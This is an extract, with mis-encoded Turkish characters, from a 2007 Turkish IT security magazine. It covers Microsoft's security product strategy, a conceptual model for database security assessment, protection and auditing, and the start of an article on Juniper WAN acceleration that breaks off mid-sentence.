12 Göksel TOPBAfi Microsoft Güvenlik Stratejisi Uçtan Uca Güvenlik ve Altyap Yönetim Çözümleri Müflterilerinden ve ifl ortaklar ndan gelen talepler do rultusunda, 2002 y l ndan bu yana bilgi güvenli i konusunda sürekli yat r mlarda bulunan Microsoft, güvenli e bütünsel bir bak fl getirerek, kurumlar n tüm bilgi güvenli i ihtiyaçlar n karfl lamay ve güvenli bir ekosistem oluflturmay hedeflemektedir. Microsoft, kifli ve kurulufllar n dünya çap ndaki ba lant l a larda, biliflim deneyimlerinin güvenli oldu u yönünde bir kuflku duymadan, çok çeflitli cihazlar, ürünler, hizmetler ve organizasyonlar aras nda çal flmalar n sa layan, daha güvenli bir dijital gelecek haz rlamak istemektedir. Buna paralel olarak Microsoft un güvenlik vizyonu kifli ve kurulufllar n, onlar için önemli olan bilgi, hizmet ve kiflilere daha güvenilir/güvenli bir flekilde ba l olan çeflitli cihazlar kullanabilecekleri- daha güvenli bir dünya yaratmakt r. Microsoft daha güvenli bir bilgi ifllem deneyimi sunmak için tüm endüstrinin ortak hareket etmesinin önemini vurgulamaktad r. Microsoft genifl kitlelere ulaflan ve internet üzerinden eriflilen MSN, Hotmail, Malicious Software Removal Tool gibi ürünlerden elde edilen bilgilere dayanan tecrübe, istihbarat ve bilgi birikimi sayesinde sürekli geliflen tehdit ortam na sadece daha h zl yan t vermekle kalmay p, ayn zamanda gelecekteki trendleri tahmin eden uzun vadeli güvenlik stratejileri gelifltirme yetene ine sahiptir. Microsoft, 2002 y l ndan beri güvenlik alan nda yapt yo- un çal flmalarla ç kard Windows XP Service Pack 2, Windows Vista, Windows Server 2003 Service Pack 1 ve Windows Server 2003 R2 iflletim sistemlerinde güvenli i bafltan ele alm fl ve güvenlik aç klar n azaltma, daha güvenli ve korunabilen sistemler oluflturma yönünde çok önemli ad mlar atm flt r. Ayl k güvenlik yamalar stratejisi, güvenlik yamalar - n oluflturmada ve da tmada kulland yeni teknolojiler ve 2002 y l ndan beri ç kan tüm ürünlerde en önemli önceli in güvenlik olmas ile güvenli biliflimin sa lanmas yönünde sektörde lider bir firmaya yak flan önderlik ile tüm yaz l m firmalar na örnek olmufltur ve olmaya devam etmek çabas içerisindedir. Microsoft un Güvenli Biliflim vizyonunun 4 önemli parças Güvenlik, Kiflisel Gizlilik, Güvenirlik ve Deneyim dir. Microsoft, güvenlik biliflim vizyonuyla birlikte güvenlik ürün ve çözümleri alan nda da çok önemli yat r mlar yapm fl ve birçok alanda k sa sürede sektörün önemli firmalar ile ifl ortakl klar kurmufltur. Araflt rma ve gelifltirmesine ay rd 100 Milyon Amerikan Dolar üzerinde bütçe, kaynak ve ortaya koydu u inovasyon ile uçtan uca güvenlik ürün ve çözümleri üreten bir yaz l m firmas haline gelmifltir. Microsoft, Forefront Güvenlik ürün ailesi alt nda toplad sunucu, istemci ve a a eriflim güvenlik çözümleri ile Vista n n A Eriflim Protokolü, Internet Explorer 7.0 içerisinde yer alan anti-pishing gibi yeni geliflmifl güvenlik özellikleri, Windows Server 2003 iflletim sistemi içerisinde yer alan ve rüfldünü ispatlam fl, EAL4+ sertifikas na sahip Certificate Authority si ve sertifika yönetiminde yeni bir dönem bafllatacak Certificate LifeCycle Manager isimli yeni ürünü ile Microsoft kurumlara ve kiflilere eksiksiz bir güvenli biliflim ortam sa lamay hedeflemektedir. Microsoft Dinamik Sistemler Giriflimi çerçevesinde, Microsoft Forefront ürün ailesinin yan nda sistem yönetim ürünlerini içeren yeni ürün ailesi Microsoft System Center 2007 de, önümüzdeki dönemde pazara ç kacakt r. Kendi kendini yöneten, kuran ve operasyonunu sa layan sistemleri hedefleyen Microsoft, bu y l sonunda ç kmas beklenen kod ad Longhorn olan Windows Server 2007 sunucu iflletim sistemi ile bu hedefine çok yaklaflm fl olacakt r. Güvenlik ve sistem yönetimi çözümlerinin entegre çal flarak, kurumlara büyük verimlilik ve eriflilebilirlik art fllar getirmesi öngörülmektedir. System Center 2007 ürün ailesi içerisinde istemci ve sunucu sistemlerinin uzaktan yönetimi, yama geçifli, yaz l m da- t m ve envanter yönetimi gibi çok önemli operasyonel ifllevlere yeni boyut kazand ran System Management Server n yeni sürümü Microsoft System Center System Configuration Manager 2007, istemci ve sunucu sistemlerinin ve uygulamalar n n proaktif ve reaktif yönetimi, gözlemlenmesi ve hata gideriminde çok büyük faydalar sa layan Microsoft un entegre çözümü, Microsoft Operations Manager n yeni sürümü, Microsoft System Center Operations Manager 2007 ürünleri bu y l içerisinde pazara ç kacakt r. Orta ölçekli iflletmelerin istemci ve sunucu sistem iflletimi ve yönetimi için de bu iki ürünün bir arada entegre bir flekilde çal flan sürümü Microsoft System Center Essentials 2007 ürünü pazara ç kacakt r. Kurumsal firmalar n büyük ihtiyac olan servis masas çözümü için Microsoft çal flmalar na devam etmektedir ve bu y l n sonuna do ru Microsoft System Center Service Desk ürününü pazara sunacakt r. Afla da Microsoft System Center ürün ailesinin yol haritas n bulabileceksiniz. Microsoft Forefront güvenlik ürün ailesi içerisinde sunucu, istemci ve a eriflim güvenli ini sa layan üç ana kategori bulunmaktad r. E-posta ve birlikte çal flma ortamlar n n güvenli ini sa lama ve anti-spam özellikleri ile kurumlara gereksiz çok say da e-posta gelmesini engelleyerek, güvenlik risklerini de ortadan kald ran Antigen ürünü, Microsoft Forefront ürün ailesi alt nda Microsoft Forefront Security for Exchange Server ve Microsoft Forefront Security for Sharepoint Server olarak 2006 y l n n son günlerinde pazara sunulmufltur. Özellikle pazara yeni sürülen ve iflletmelere büyük verimlilik ve üretkenlik art fl getirmesi beklenen Office System 2007 ürün ailesi içerisinde yer alan Exchange Server 2007 ve Sharepoint Portal Server 2007 ürünleriyle Microsoft, kurumlar n e-posta ve birlikte çal flma deneyimlerinde yeni bir dönem bafllat rken, bu ortamlar n güvenli ini de en bafltan planlam fl ve bu iki yeni ürünle birlikte güvenlik çözümlerini de ayn anda pazara ç karm flt r. 25 Eylül 2006 da Gartner, Security Boundary Magic Quadrant raporunda Microsoft u E-posta güvenli ini sa layan lider firmalar aras nda göstermifltir. (fiekil2) Microsoft un istemci taraf ndaki güvenlik ürünü Microsoft Forefront Client Security nin bu y l ortas nda ç kmas beklenmektedir. Kas m ay nda Beta s ç kan ve etkin bir anti-virus/anti-spyware çözümü olan Forefront Client Security, kurumsal ortamlarda istemci ve sunucu güvenli ini en üst seviyeye tafl may hedeflemektedir. Microsoft un en yeni ve geliflmifl entegre internet ve a geçidi çözümü Microsoft ISA Server 2006, geçti imiz aylarda piyasaya ç km flt. ISA Server 2006 kurumlar n bilgi teknolojileri ortamlar n internet tabanl tehditlerden korurken, ayn zamanda kurum için uygulamalara ve veriye h zl ve güvenli eriflimi sa lamaktad r. nternete kurum içi uygulamalar n güvenli bir flekilde aç lmas, uzak ofis geçidi çözümlerinin etkinli i, veriminin artt r lmas ve web eriflim korunmas gibi çok önemli ifllevleri gerçeklefltiren ISA Server 2006, kurumlar n uçtan uca güvenlik çözümlerinin oluflturulmas nda etkinli i ve kolay kullan labilirli i ile önemli avantajlar sa layacakt r. Microsoft un güvenlik çözümlerini merkezde Forefront ürün ailesi olacak flekilde afla daki gibi k saca özetlememiz mümkündür: (fiekil2) Kurumlara içerik ve doküman denetimi ve güvenli inde çok önemli avantajlar sunan Windows Rigths Management Services den de bahsetmemiz uçtan uca güvenlik bak fl m z n eksik kalmamas için çok önemli diye düflünüyorum. Windows Server 2003 ün bir servisi olan Rights Management Services ile kurumlar, kurum içi doküman ve e-postalar n istenmeyen kiflilere yönlendirilmesi, okunmas ya da yaz c - dan ç kt al nmas n önleyerek, bilginin güvenli i ve gizlili i etkin bir flekilde sa lanabilmektedir. Microsoft kurumsal güvenli e bütünsel bir bak fl getirerek kurumlar n güvenli e bak fllar n n da eksiksiz olmas n sa lamakta ve genifl ekosisteminin bilgi ve tecrübesi ile kurumlar n ihtiyac olan güvenlik ihtiyaçlar etkin bir flekilde karfl lamaktad r Ocak 2007 tarihleri aras nda Microsoft Güvenlik Zirvesi nde, Microsoft Forefront güvenlik ürünleri ailesi ve Microsoft System Center 2007 sistem yönetim ürün ailesi hakk nda teknik sunumlarda çözümlerin detay, etkinli i, müflteri ve ifl ortaklar m za aktar lacakt r. Microsoft olarak bu çok önemli iki ürün ailesinin yeni ürünlerini 2007 y l içerisinde ç kar yor olmaktan çok mutluyuz. Bu vesile ile Microsoft olarak 2007 y l n n tüm Beyaz fiapka okurlar na güvenli, verimli ve çok baflar l bir y l olmas n gönülden dileriz. 22 beyazflapka flubat 2007 flubat 2007 beyazflapka 23

13 Hakan ÜNSAL ETK N B R VER TABANI GÜVENL S STEM MODEL Sizde Sanctum Var M? Sanctum: (isim) Özel oda/kutsal yer, kutsal yer, girilmesi yasak, özel. Etimoloji: Geç Ça Latince Telaffuz: 'sa[ng](k)-t&m Büyük kurumlar m z n data center ad n verdi imiz, a rl kl olarak web ve veritaban sistemlerini bulunduran merkezleri, yukar daki sanctum tabirine ne kadar da uyuyor. Adeta göz bebe i durumdalar. Tüm ifl zekam z, flirketlerimizin hassas bilgileri, canl tüm faaliyetlere temel olan veri bu sanctum larda duruyor. Bu veri merkezlerinde depolad - m z ve ço u zaman muazzam miktarlara ulaflabilen veriyi iki ana kategori alt nda s n fland rabiliriz. Uygulama Verileri ve Dosyalar. Dosyalara örnek olarak sunumlar, PDF ler, hesap tablolar, e-postalar, ofis dokümanlar vs. verilebilir ve bu makalenin d fl nda baflka bir yaz m zda bunlara özel güvenlik mekanizmalar ndan bahsetmeyi düflünüyoruz. Öte yandan Uygulama Verisi ad n verdi imiz k s m ise genellikle de iflik kurumsal uygulamalar (VTYS, web uygulamalar, MRP sistemleri, CRM sistemleri vs.) taraf ndan ifllenip saklan yor ve kurumlar n yapt ifl in do as na ba l olarak bu tip veri çok çeflitlilik arz edebiliyor; kredi kart numaralar, müflteri ve hesap bilgileri, sat fl bilgileri/analizleri, finansal bilgiler, stok bilgileri vs. Do al olarak, güvenlik sistemleri yöneticileri olarak bu sanctum larda en yüksek güvenlik seviyesini istiyoruz. Ama ifl birimleri sahip veya yöneticilerinin ise bu noktalara eriflimde kesintiye de hiç tahammülü yok. fiu çeliflki muhakkak size tan d k geliyordur: Çok güvenli olsun ama sak n kesinti yaflamayal m, sak n eriflim yavafllamas n. Bu yaz m zda art k bu çeliflkinin gerçek olmad n, hem çok h zl hem de çok güvenli sanctum lar yaratman n hangi teknolojik yaklafl mlarla mümkün olabilece ine dair ipuçlar vermeye çal flaca z. Neyi Koruyaca z? Bütün veriler ayn derecede kritik de ildir. Baz lar di erlerinden daha kritiktir, baz lar ise hiç önemli de ildir. Bu cümle biraz George Orwell n meflhur 1984 roman n and r yor ama bilgi güvenli i aç s ndan bakt m zda, hassas veriyi tespit edip belirlemek ve bu hassas veriyi tüm muhtemel tehditlerden korumaya yo unlaflmam z gerekti i konusunda güzel bir hat rlat c. Genelde 4 tip hassasiyetten bahsedebiliriz: 1. Finansal bilgi, müflteri bilgisi gibi yetkisiz kaynaklar/kifliler taraf ndan eriflilmemesi gereken gizli bilgi. (Condifentiality) 2. Kredi kart numaras, hesap bilgisi gibi yetkisiz eriflimden korunmas gereken kifliye/kuruma özel bilgi. (Privacy) 3. Menkul k ymetler borsas fiyatlar, döviz paritesi gibi içeri- inin yetkisiz de iflimden korunmas gereken bilgi. (Integrity) 4. Sistem süreklili ini devam ettirmek için korunmas gereken sistem verileri. (Availability) Bu tür kritik veriye yönelik tehditleri ise iki ana bafll k alt nda gruplayabiliriz: Önceliklerin ve/veya yetkilerin ihlali: Kullan c lar söz konusu veriye eriflim esnas nda kendilerine tan nm fl olan s - n rlar n/yetkilerin ötesine geçmeye çal flarak bilgiyi de ifltirmeye, bozmaya ya da kendilerine sunulandan fazlas na eriflmeye çal flabilirler (örne in veritaban ndan tüm müflteri kay tlar n okumaya çal flan bir DBA ya da web sitesi üzerinden SQL injection ile flifresini bilmedi i bir baflka kullan c n n bilgilerine eriflmeye çal flan bir son kullan c ). Zafiyetlerin aç a ç kart lmas, bunlardan faydalanma: Sunulan hizmete eriflimi olan kullan c lar n söz konusu sistem bileflenlerinin birinde ya da birkaç nda var olan zafiyetlerden, konfigürasyon hatalar ndan yararlanarak, bunlar kullanarak, kendilerine tan nan eriflim haklar n daha üst seviyeye ç kartmalar ve yetkileri olmayan bilgilere/kaynaklara eriflmeleri. Bu tehditler hem iç hem d fl risk unsurlar ndan kaynaklanabilir. Örne in müflteriler, ifl ortaklar ve internet kullan c lar gibi hizmet olarak sundu unuz uygulamalara eriflme imkan olan kullan c lar, kendi gelifltirdi iniz ya da sat n ald n z uygulama içindeki (veya altyap s ndaki) aç klar ortaya ç kartarak uygulaman z ya da onu destekleyen arka plandaki veritaban n z içindeki bilgiye yetkisiz eriflim sa layabilirler. Ço- unlukla güvendi iniz ve dolay s yla gözünüzün kula n z n pek de üzerinde olmad iç kullan c lar da uygulamalar n z, onlar sa l kl çal flmas n sa layan altyap sal bileflenler ve arka plan ndaki veritabanlar üzerinde var olan aç klardan faydalanma yoluna gitmeyi tercih ederek ayn flekilde yetkisiz eriflim giriflimlerinde bulunabilir. Yöneticiler (a yöneticileri, sistem yöneticileri, veritaban yöneticileri), ve uygulama/kod gelifltiriciler, eriflme/de ifltirme yetkileri olmayan verilere eriflmek için birçok arka kap y çeflitli flekillerde aç k b rakabilir. Örne in bir okuldaki tüm ö retmenlerin s nav sonuçlar n girdi i, buna ba l olarak hangi ö rencinin sene sonunda hangi baflar seviyesinde oldu unu, s n fta kal p kalmad n belirleyen otomatik bir sistemi tasarlayan kifli, verilerin birikti i veritaban nda, kendi gelifltirdi i uygulamay kullanmadan, do rudan icra edece i basit bir update temelli SQL cümleci i ile arkas nda hiç iz/log vs. b rakmadan kendine yak n buldu u bir ö rencinin s nav notlar n illegal bir flekilde yükseltebilir çünkü bu tip kod gelifltiricilerin söz konusu uygulama/veri tabanlar na hemen hemen her zaman en genifl eriflim mekanizmalar ile eriflmesine izin verilmifl durumdad r (çünkü o suyun bafl ndaki adamd r ve su kesilirse herkesi rahats z edip, ortal aya a kald rmaktad r). Özetle, sistemlerimizde tan mlad m z kullan c lar n kendilerine tan nm fl hassas veriye eriflim, de ifltirme ve silme haklar n /seviyelerini ihlal etmelerine engel olmaya çal fl yoruz. Ve bunun yan s ra istisnas z herkesin sanctum lar m zdaki muhtemel zafiyetlerden faydalanarak hassas bilgilere eriflmesini, de ifltirmesini ve yok etmesini engellemeye çal - fl yoruz. Peki bu hassas bilginin ne oldu una ve nerede bulundu una nas l karar verece iz? Bu konuya afla da tekrar geri dönece iz. Nas l Koruyaca z? Varsayal m ki veritabanlar m z n önünde bir bekçi var ve bu veritabanlar na giren ç kan tüm verinin en alt seviyede takibini (auditing) yap yor ve her türlü flüpheli veritaban hareketinde bizi uyar yor. Ve yine varsayal m ki bu bekçi, bizim zararl olarak tan mlad m z her türlü hareket tan m na uyan trafi i durduruyor. Üstelik de eriflim h z nda hiçbir yavafll k yaratm yor. Elbette bu çok güzel olurdu ama büyük sorun flu ki, bu bekçiye neyi nas l 'audit' edece ini çok detayl bir flekilde ö retmemiz gerekir. Neyin uyar mekanizmalar n devreye sokaca n, neyin ise do rudan durdurulmas gerekti ini tek tek belletmemiz gerekecektir bu bekçiye. Üstelik (maalesef), ço- unlukla bu belletme görevini yapmas n bekledi imiz kurumumuzdaki güvenlik yöneticisi zaten (hali haz rda kurumdaki veritabanlar üzerindeki uygulama detaylar na sahip olma aç s ndan düflünüldü ünde) bir nevi kördür. Yani ondan veritaban ndaki hangi tablo üzerinde hangi kullan c n n update, hangi kullan c n n select yapma hakk oldu unu bilmesini beklememiz ve buna dayanarak bekçiye belletme yapmas n beklememiz biraz ütopik olur. Dolay s yla, veritabanlar na eriflim aç s ndan düflünüldü ünde, çal flma ortam n z anlamak ve bu ortam içindeki aktiviteyi çok iyi analiz edebilmek, veritabanlar n n güvenli ini en üst seviyeye çekebilmek aç - s ndan anahtar unsurdur. flte bu noktada veritaban güvenlik de erlendirmesi süreçleri devreye girer. Bu süreçlerin birkaç amac, baflka bir deyiflle cevaplamaya çal flt birkaç soru vard r: Hangi bilgi hassast r ve korunmas gerekmektedir? (Baflka bir deyiflle hangi bilgi kritiktir ve korunmas gerekir, hangisi/leri ise daha az önemlidir ve korunmas için imkan/kaynak harcanmas na ihtiyaç yoktur?) Bu bilgiye de iflik kaynaklar taraf ndan nas l eriflilmektedir? Ne zaman, hangi IP den, hangi client-side tool ile, hangi tablolara, hangi operasyonlar ile (select, update, delete)? Bilgiye eriflilmesini istedi iniz yöntemler bu mudur? Bilgiye eriflimin en güvenli yolu bu mudur? Her eriflim kayna ndan (source) gelen tehdit (seviyesi/miktar ) nedir? Hassas bilgilere eriflimi k s tlamak için hangi eriflim kontrol mekanizmalar devreye sokulabilir/sokulmaktad r? Veritaban nda ve destekleyicisi olan altyap s nda herhangi bir zafiyet (vulnerability) var m d r? Yanl fl/eksik konfigüre edilmifl veritabanlar, Vendor aç klar vs. Bu zafiyetlerin aç a ç kar lmas na/kullan lmas na engel olabilecek güvenlik kontrolleri nelerdir? Özetle; kapsaml bir veritaban güvenli i projesinin üç ana bilefleni olmal d r ve bu makalenin geri kalan k s mlar nda bu üç ana bileflen etraf nda flekillenen model hakk nda detaylara inmeye çal flaca z: 1. De erlendirme - Hassas bilgi nedir ve nerededir? - Normal flartlar dahilinde bu bilgilere nas l erifliliyor? - hlaller hangi noktada ve nas l olabilir? 2. Koruma - Kritik bilgiye eriflimin s n rlanmas - Olas zafiyetlerden faydalan lmas n n engellenmesi 3. Audit - Kritik bilgiye eriflimin takibinin yap lmas - Uygun seviye ve miktarda raporlaman n yap lmas fiekil 1: Veritaban Korumas n n Üç Aflamas 24 beyazflapka flubat 2007 flubat 2007 beyazflapka 25

14 ETK N B R VER TABANI GÜVENL S STEM MODEL Sizde Sanctum Var M? Veritaban Güvenlik De erlendirmesi Nedir? T pk bir boks antrenörünün yetifltirdi i sporcunun as l maça ç kmadan önce aç klar n keflfetmek ve kapatmas n ö renmek/ö retmek için üst üste savurdu u yumruklar gibi uygulamalar n za ve/veya veritabanlar n za do ru, onlar n aç k noktalar n bulmak amac yla üst üste yapt n z sald r - lar m d r? Ya da yanl fl/eksik konfigürasyon unsurlar n /kusurlar n bulmak için i ne ile kuyu kazar gibi tüm veritabanlar n z üzerinde ince ince yapt n z araflt rmalar ve gözden geçirmeler midir? Bu iki örne i özellikle veriyoruz çünkü ço- u zaman güvenlik de erlendirmeleri (security assessment), zafiyet de erlendirmesi (vulnerability assessment) ve aç k taramas (vulnerability scanning) ile kar flt r l yor. Bu son ikisi güvenlik de erlendirmesi süreçlerinde faydalan lan birçok araçtan sadece ikisidir. Baflka bir deyiflle, güvenlik de erlendirmesi sadece bu ikisinden daha öte bir fleydir. Gerçek anlamda veri güvenli ini elde etmek için sanctum lar n zdaki uygulama verisini iflleyen tüm varl klar n z (web sunucular, uygulama sunucular ve veritabanlar ) üzerinde de- erlendirme, koruma ve auditing süreçlerini eksiksiz olarak uygulaman z gerekmektedir. Bu hedeflere ulaflmak için bir çok yol vard r. Web ve uygulama sunucular için güvenli kodlama tekniklerini takip edebilirsiniz, gelifltirdi iniz kodun uzman sistemler ya da dan flmanlar taraf ndan gözden geçirilmesini sa layabilirsiniz, s zma testleri uygulayabilirsiniz (penetration testleri), yamalar güncel olarak uygulayabilirsiniz, sunucu s k laflt rmas prensiplerini s k s k ya takip edebilirsiniz ve web/xml uygulama firewall lar kullanabilirsiniz. Piyasadaki kimi ürünler bu ifllevlerin birden fazlas n bünyesinde bulundurmaktad r. Baz lar sadece bir alanda (örne in kod analizi) derinlemesine inceleme imkan sa lar (daha önce de belirtti imiz gibi uygulama katman n n temelini oluflturan web ve uygulama sunucu güvenli ini baflka bir makalemizde ele almay planl yoruz). Bu yaz m zda veritabanlar n n güvenli ine yönelik konular paylaflaca z. Web ve uygulama sunucular nda oldu u gibi veritabanlar - n n da güvenlik de erlendirmesi, koruma ve auditing hedefleri için kullan labilecek bir çok teknik mevcuttur. Bunlar aras nda veritaban kullan m n n gözden geçirilmesi, zafiyet taramas, kesin s n rlarla belirlenmifl eriflim kontrolleri, yamalar n zaman nda geçilmesi ve testi, sunucu s k laflt rma ifllemleri, sütun ve/veya alan bazl flifreleme ve audit analizleri say labilir. Bu noktada, yukar daki kapsaml veritaban /bilgi güvenli i projesinin anahtar bileflenleri sorular na geri dönelim isterseniz. Hassas bilginin hangi bilgiler oldu una ve nerede bulundu una nas l karar veririz? Bu noktada birkaç de iflik yaklafl m olabilir: 1. En basiti sormakt r. fl birimi sahiplerinize, DBA lerinize vs. bu bilginin ne oldu unu ve nerede oldu unu sorabilirsiniz. Sizin için hangi veritabanlar ndaki hangi bilgiler kritik? Hangisinin korunmas na ihtiyaç var? Sorun flu ki ilgili muhataplar buldu unuzu var saysak bile ne kadar h zl ve do ru cevap alaca n z tart fl l r olacakt r. 2. DBA lerinizin yard m ile sahip oldu unuz tüm veritabanlar n iyice bir gözden geçirirsiniz. Bu metot, sonuçlar itibar ile veritaban güvenli i aç s ndan oldukça do ru kararlar alman z sa lar ancak takdir edilece i üzere çok zaman al c bir ifllemdir ve büyük kurumlarda sahip olunan veri miktar düflünüldü ünde hiç de pratik bir çözüm de ildir. 3. Baz hassas patern'leri filtreleyerek sonuca ulaflmay deneyebilirsiniz. Örne in VTYS üzerinde kredi kart numaras, kullan c kimlik bilgileri vs. gibi patern'leri filtreleyecek araçlar çal flt r p bu tip verilerin hangi tablolarda, veritabanlar nda oldu unu keflfedersiniz. 4. SAP, PeopleSoft vs. uygulamalarda haz r bulunan ön tan ml listeleri kullan p kurumsal anlamda sizin için önem arz eden bilgilerin nerelerde depoland n bulmaya çal flabilirsiniz. Asl nda bunlar n hepsi kendi içinde bir auditing ifllemidir ve yukar daki metotlar n hepsinde ortak olarak gözüken problem ise bilgilerinizin (bilhassa büyük kurumsal ortamlarda) çok de iflken olmas ndan dolay bu yapt n z ifllerin s k s k yenilenmesi gere idir. Ortam n zdaki de iflikliklerin takibini nas l yapacaks n z? Bu baflar ya giden yolda önemli bir husustur ve genellikle De ifliklik Yönetim Sistemleri (change control tools) bu noktada bize yard mc olabilir. Elbette söz konusu de ifliklik takip sistemlerinin nihai olarak kuraca - m z veritaban güvenlik sisteminin içine bir otomatik auditing arac flemsiyesi alt nda entegre olmas n bekleriz çünkü bu bizi en ideal duruma biraz daha yaklaflt rm fl olacakt r. Normal aktiviteyi nas l tespit edece iz sorusuna dönelim. Yani normal flartlar dahilinde veritabanlar m zdaki kurumsal bilgilere nas l erifliliyor? Bu noktada da biraz öncekine benzer flekilde birkaç de iflik yaklafl m olabilir: 1. Gene ilgili birimlere sorma yolunu seçebilirsiniz. Avantaj ve dezavantajlar na yukar da k saca de inmifltik. 2. Bilginin sadece uygulamalardan gelece ini var sayarak söz konusu uygulama kodunuzu gözden geçirirsiniz. Bu oldukça iyi bir yöntemdir ancak pratik de ildir çünkü söz konusu kodlar çok büyüktür, baflkas ndan sat n al nm flt r, size açmazlar vs. 3. Sahip oldu unuz VTYS nin Auditing imkanlar n devreye al p normal aktivitenin ne oldu unu takip etmeye çal flabilirsiniz. Ama bunu yapt n zda k sa zamanda milyonlarca sat r log ile karfl karfl ya kalabilirsiniz (bunlar n nerede depolanaca, nas l analiz edilece i ise ayr bir sorundur). Burada da sahip olaca n z nihai güvenlik çözümün içine entegre olmufl bir otomatik auditing arac oldukça faydal olacakt r. Bu noktada yukar da birkaç de iflik vesile ile de indi imiz otomatik auditing arac n n temel baz özelliklerinden bahsedelim. Sahip olaca m z (ya da olmam z gereken) otomatik auditing arac n n 5N1K hakk nda bize bilgi vermesini bekleriz: Kim: Kullan c lar hangi kullan c ad yla veritabanlar m za ba lan yor? Client-side iflletim sistemi üzerindeki (örn. Windows domain lerindeki) hangi kullan c lar, veritaban sistemimize hangi kullan c ad ile erifliyor ve ayn hesab (örne- in sa veya test ) birden fazla kifli paylafl yor mu? Kullan c lar m z n hangileri, hangi hassas bilgilere erifliyor? Nerede(n): Nereden, hangi IP den geliyorlar? Dinamik IP yönetimi yap lan ortamlarda (DHCP vs.) hangi hostname lerden eriflim var? Ne: Hangi tablolar üzerinde hangi sorgular yap yorlar (ne yap yorlar)? Yapt klar sorgular n ortak özellikleri ve detaylar nedir? Ne zaman: Eriflim ne zaman yap l yor? Mesai saatleri dahilinde mi, hafta sonu mu, sadece sene sonunda bir gece yar - s m (batch job) vs.? Neden: Bir otomatik audit arac buna tek bafl na karar veremez ama güvenlik yöneticileri olarak bizim olan biteni anlamam za yard mc olur. Hangi veritabanlar na ve flemalarla ifl yap yorlar? Nas l: Hangi protokol üzerinden geliyorlar (stunnel? Cleartext port 1521)? Ya da PC lerde yüklü bir uygulama ile mi (örn. TOAD.exe), yoksa bir uygulama içinden mi (örn. Oracle Application Server)? Söz konusu kullan c lar n ayr cal kl operasyonlar (drop table, backup vs.) yapmaya ihtiyac var m? Son olarak da var olan (ya da var olmas muhtemel) zafiyetleri nas l tespit edece iz sorusuna metodik yaklafl m seçeneklerimizi gözden geçirelim: 1. Veritabanlar m z üzerinde zafiyet tarama araçlar kullanabiliriz. Piyasada birçok araç var bu konuda. Baflka bir deyiflle, boksör antrenörü örne ini hat rlarsak, sürekli olarak muhtemel zay f noktalar bulmak için veritabanlar m z yumruklayabiliriz. Güvenlik yöneticilerinin en sevdikleri metotlar n bafl nda bu gelmektedir. 2. Büyük bir sab rla, tüm veritaban sistemleriniz üzerinde ince ayarlar ve kontroller yapabilirsiniz. Sistem parametreleri, registry kay tlar /de erleri incelemesi vs. yap p muhtemel ve/veya bilinen aç klar hakk nda ipucu arars n z. Bu ifllem genellikle bir veritaban uzman n n kat l m n da gerektirir. 3. Pasif de erlendirme yapabilirsiniz. Bu ifllem genellikle audit trail dosyalar n n veya sistem konfigürasyon dosyalar - n n incelenmesini ve buralarda zay fl klar bulunmas n hedefler. Örne in düzenlemeyi unuttu unuz varsay lan kullan c hesaplar (default accounts), parolas olmayan kullan c hesaplar (Joe accounts), SQL Injection a aç k vulnerable query lerin tespiti vs. Bu konuda da piyasada ücretli/ücretsiz bir çok araç var. Devam edecek beyazflapka flubat 2007 flubat 2007 beyazflapka 27

15 Murat ÖZDEM R A ve Uygulama H zland rma Juniper WX/WXC platformlar WAN üzerinde uygulamalar s k flt rma, protokol h zland rmas, bantgeniflli- i yönetimi, rota optimizasyonu ve raporlama tekniklerini entegre ederek LAN performans nda çal flmas n sa lar. WX/WXC platformlar WAN kapasitesini yedek transmisyonu eleyerek, TCP ve uygulama tabanl protokolleri h zland rarak (CIFS, MAPI, HTTP dahil), bantgeniflli i kullan m n önceliklendirerek, farkl rotalardan giden uygulama ak fl n optimize ederek WAN kapasitesini artt - r r. WXC platformlar ayr ca üzerindeki sabit disk sayesinde daha uzun trafik flablonu tutarak zaman içerisinde daha yüksek oranda trafik s k flt rmas sa lar. fiekil-1 Uygulama baz nda trafik s k flt rma de erleri WX/WXC platformlar n n kulland teknikler sayesinde WAN hatlar üzerindeki karfl l k verme kapasitesi artar; örne in TCP tabanl uygulamalarda 5 kata kadar, Microsoft Exchange ve Windows dosya paylafl m nda 100 kata kadar. WX/WXC platformlar n n kulland teknikler ve özellikleri flu flekildedir: Molecular Sequence Reduction (SIKIfiTIRMA) Molecular Sequence Reduction (MSR), WX/WXC platformlar n n en önemli s k flt rma algoritmas d r. Patentlenmifl olan bu teknik, kurumlar n WAN data hatlar n 10 kata kadar kapasiteyle kullanmas n sa lamaktad r. Bu teknik, paketlerin DNA s n inceleyerek efllefltirme yapmaktad r. MSR, tekrarlanan veri flablonlar n tan r ve bunlar etiketlerle de ifltirir. MSR tekni i tamam yla cihaz n haf zas üzerinde çal flmaktad r ve bu tekni in sözlü ü yüzlerce megabyte l k veri flablonlar n tutabilir. bu flekilde WAN hat kapasitesinden geçebilecek gerçek trafi in ve uygulama performanslar n n artmas en h zl bir flekilde sa lanm fl olur. Network Sequence Caching Network Sequence Caching, patent bekleyen WXC platformlar nda olan bir tekniktir. Bu teknik t pk MSR s k flt rma tekni inde oldu u gibi data flablonlar n IP seviyesinde tan r ve etiketlerle de ifltirir. MSR tekni inden fark, haf zada de il sabit diskte gerçekleflmesidir. Bu teknik MSR tekni inden daha uzun veri flablonlar n gözlemlemesi ve aradan yüzlerce gigabyte data ve/veya haftalar geçse bile veri flablonlar - n tan yabilmesidir. Packet Flow Acceleration (TCP Acceleration) Packet Flow Acceleration (PFA), WAN üzerindeki TCP performans n artt r r. Active Flow Pipelining TCP performans n, TCP ba lant lar n yerel olarak sonland rarak art ran bir tekniktir. Bu teknik sayesinde yüksek bantgeniflli i veya yüksek gecikmeli ba lant gereksinimi duyan uygulamalar h zlan r. Forward Error Correction Kay plar n yafland hatlarda yinelenen paketleri eleyen bir tekniktir. Application Flow Acceleration (Application-Specific Acceleration) Application Flow Acceleration (AppFlow) tekni i, WAN gecikmesi taraf ndan etkilenen uygulamalar saydam olarak h zland r r. AppFlow tekni i özellikle 3 protokolde etkilidir: Microsoft Exchange taraf ndan kullan lan Messaging Application Programming Interface (MAPI), Microsoft dosya servisinin kulland Common Internet File System (CIFS), ve HTTP. Exchange ve dosya servislerinde veri iletiflimi küçük bloklar fleklinde iletilmektedir ve bir ifllemin tamamlanmas için yüzlerce hatta binlerce ACK gerekebilir. O yüzden 20ms, 30ms gibi gecikme olan hatlarda performans ve üretkenlik düflmektedir. Yine benzer flekilde HTTP uygulamas nda bir sayfan n yüklenmesi için düzinelerce RTT (round-trip-time) gerekebilir. AppFlow tekni i, veri bloklar n ve web objelerini biriktirip WAN kapasitesini dolduracak flekilde gönderir. Bu ifllemin sonucunda uygulama 